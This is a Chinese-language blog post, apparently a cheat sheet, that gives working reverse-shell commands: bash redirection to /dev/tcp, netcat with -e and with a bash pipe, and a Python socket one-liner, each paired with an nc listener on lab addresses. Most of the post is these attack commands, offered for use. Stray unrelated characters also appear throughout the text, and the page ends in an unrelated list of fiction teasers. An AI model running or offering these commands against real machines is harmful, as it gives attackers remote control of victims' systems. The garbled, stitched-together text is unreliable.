【反彈shell】常見(jiàn)的反彈shell

0x01

受害機(jī)命令
bash -i >& /dev/tcp/x.x.x.x/1234 0>&1

本機(jī)命令
nc -lvvvp 1234

首先在受害機(jī)(192.168.80.133)中開(kāi)一個(gè)終端绘证,輸入

bash -i >& /dev/tcp/192.168.80.134/1234 0>&1

然后再本機(jī)(192.168.80.134)中開(kāi)個(gè)終端,界面如下

輸入如下命令

nc -lvvvp 1234

可以看到終端的標(biāo)簽已經(jīng)改變了起趾,嘗試輸入命令可以發(fā)現(xiàn)已經(jīng)得到了一個(gè)shell

0x02 netcat

如果目標(biāo)主機(jī)有nc -e選項(xiàng)的話抖所,也可以通過(guò)-e進(jìn)行反彈shell
還是以剛才的環(huán)境來(lái)做實(shí)驗(yàn)
首先饱搏,在本機(jī)上輸入

nc -lvvp 1234

進(jìn)行監(jiān)聽(tīng)
然后再受害機(jī)輸入

nc -e /bin/bash 192.168.80.134 1234

發(fā)現(xiàn)在本機(jī)的終端已經(jīng)可以執(zhí)行shell了

但是萬(wàn)一沒(méi)有-e選項(xiàng)呢叭披,那么還可以用管道進(jìn)行反彈shell
首先在本機(jī)開(kāi)兩個(gè)端口監(jiān)聽(tīng)

nc -lvvvp 1234
nc -lvvvp 4321

然后受害機(jī)輸入

nc 192.168.80.134 1234 | /bin/bash | nc 192.168.80.134 4321

得到shell


0x03 Python

python -c 
'
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.80.134",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
'

首先在本機(jī)輸入

nc -lvvvp 1234

在受害機(jī)輸入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.134",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

即可看到反彈了一個(gè)shell

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市慈参,隨后出現(xiàn)的幾起案子呛牲,更是在濱河造成了極大的恐慌,老刑警劉巖驮配,帶你破解...
    沈念sama閱讀 219,110評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件娘扩,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡壮锻,警方通過(guò)查閱死者的電腦和手機(jī)琐旁,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,443評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)猜绣,“玉大人灰殴,你說(shuō)我怎么就攤上這事£希” “怎么了牺陶?”我有些...
    開(kāi)封第一講書人閱讀 165,474評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵伟阔,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我掰伸,道長(zhǎng)皱炉,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書人閱讀 58,881評(píng)論 1 295
  • 正文 為了忘掉前任碱工,我火速辦了婚禮娃承,結(jié)果婚禮上奏夫,老公的妹妹穿的比我還像新娘怕篷。我一直安慰自己,他們只是感情好酗昼,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,902評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布廊谓。 她就那樣靜靜地躺著,像睡著了一般麻削。 火紅的嫁衣襯著肌膚如雪蒸痹。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書人閱讀 51,698評(píng)論 1 305
  • 那天呛哟,我揣著相機(jī)與錄音叠荠,去河邊找鬼。 笑死扫责,一個(gè)胖子當(dāng)著我的面吹牛榛鼎,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播鳖孤,決...
    沈念sama閱讀 40,418評(píng)論 3 419
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼者娱,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了苏揣?” 一聲冷哼從身側(cè)響起黄鳍,我...
    開(kāi)封第一講書人閱讀 39,332評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎平匈,沒(méi)想到半個(gè)月后框沟,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,796評(píng)論 1 316
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡增炭,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,968評(píng)論 3 337
  • 正文 我和宋清朗相戀三年街望,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片弟跑。...
    茶點(diǎn)故事閱讀 40,110評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡灾前,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出孟辑,到底是詐尸還是另有隱情哎甲,我是刑警寧澤蔫敲,帶...
    沈念sama閱讀 35,792評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站炭玫,受9級(jí)特大地震影響奈嘿,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜吞加,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,455評(píng)論 3 331
  • 文/蒙蒙 一裙犹、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧衔憨,春花似錦叶圃、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 32,003評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至码党,卻和暖如春德崭,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背揖盘。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 33,130評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工眉厨, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人兽狭。 一個(gè)月前我還...
    沈念sama閱讀 48,348評(píng)論 3 373
  • 正文 我出身青樓憾股,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親椭符。 傳聞我的和親對(duì)象是個(gè)殘疾皇子荔燎,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,047評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容